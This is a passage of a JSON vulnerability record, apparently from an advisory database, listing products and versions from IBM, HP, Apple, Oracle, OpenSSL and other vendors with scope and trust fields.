"8.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.2.5" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.4.0.4.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.0" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.31.38.0" }, { "model": "openscape voice r1.42.0", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.9.2" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "algo one pcre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "netezza platform software 7.0.2.16-p1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "bundle of g8264cs image", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "openscape voice r1.37.0", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.0.0" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6.0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.41" }, { "model": "infosphere guardium for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "netezza platform software 7.0.2.16-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "openscape voice r1.38.0", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.33" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.3.0" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.3.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.213" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "virtual connect enterprise manager sdk", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.1.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.03" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.3" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "secure global desktop", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.71" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.5.1.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "aspera drive", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.1" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1" }, { "model": "rational insight", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "system networking rackswitch g8052", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.3.0" }, { "model": "qradar security information and event manager mr2 patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "netezza platform software 7.1.0.5-p2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.50" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.3" }, { "model": "openscape voice r1.3.0", "scope": "eq", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.1" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.3.1" }, { "model": "tuxedo", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.1.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.0.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.14" }, { "model": "i operating systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.2" }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.9.0" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "cognos planning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "gb esm ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1/106.8.21.0" }, { "model": "rational developer for i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "algo one mag", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.8" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.9" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tssc/imc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.9.790" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5.1" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2.1" }, { "model": "rational tau interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "screenos", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "bladecenter t advanced management module 32r0835", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.801" }, { "model": "flex system en2092 1gb ethernet scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.11.0" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "system storage san768b-2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "system networking rackswitch g8316", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.14.0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.11" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system networking rackswitch g8264", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.4.0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.16" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "2.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.2.0.2" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "exalogic infrastructure", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.0.6.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "qradar security information and event manager patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aspera proxy", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.03" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.143" }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "version control repository manager", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "openscape voice r1.43.1", "scope": "ne", "trust": 0.3, "vendor": "unify", "version": "v8" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.0.8" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl beta3", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.1" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "2.3.13" }, { "model": "bladecenter -t", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8730" }, { "model": "rational tau", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.31" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "gb esm ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1/106.8.20.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.6" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.31.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.132" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.6" }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "system networking rackswitch g8316", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.13.0" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0-12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "secure backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.1.0.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "bladecenter -h", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7989" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.8.0" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.3" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "project openssl beta1", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "bladecenter -ht", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8740" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": 